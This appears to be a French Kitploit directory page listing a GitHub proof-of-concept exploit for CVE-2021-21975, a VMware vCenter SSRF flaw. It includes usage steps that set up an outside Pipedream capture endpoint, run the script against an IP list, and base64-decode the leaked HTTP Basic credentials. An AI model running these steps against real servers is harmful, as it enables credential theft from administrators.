Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-21975 — Exploit de preuve de concept pour CVE-2021-21975 (VMware vCenter Server SSRF) qui utilise la falsification de requête côté serveur pour divulguer des identifiants encodés en base64 via l'authentification de base HTTP. | Kitploit
Outils/GitHubGitHub/dorkerdevil/cve-2021-21975
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'Informations
GitHubdorkerdevil/cve-2021-21975

CVE-2021-21975

Exploit de preuve de concept pour CVE-2021-21975 (VMware vCenter Server SSRF) qui utilise la falsification de requête côté serveur pour divulguer des identifiants encodés en base64 via l'authentification de base HTTP.

Voir le dépôt
22il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-21975

#SSRF-POC - ssrf vers fuite de credentials

#Configurez d'abord le client pd.

#Exécutez maintenant ./pd deploy http-new-requests

#remplacez maintenant la requête http pipedream ex: Randomstring.m.pipedream.net dans le script

#exécutez ceci dans un terminal séparé - ./pd logs new-requests | tee -a req.txt

#et maintenant exécutez ceci dans un autre terminal - python3 CVE-2021-21975.py iplist

#cat req.txt | grep Basic > basic.txt; cat basic.txt | sort --unique > basic_uniq.txt ; base64 -d basic_uniq.txt

"Ceci est une preuve de concept précoce créée lorsque la vulnérabilité a été rendue publique il y a des mois, alors utilisez-la à vos propres risques." :V

#crédits @wabaf3t @D0rkerDevil

Télécharger l’outil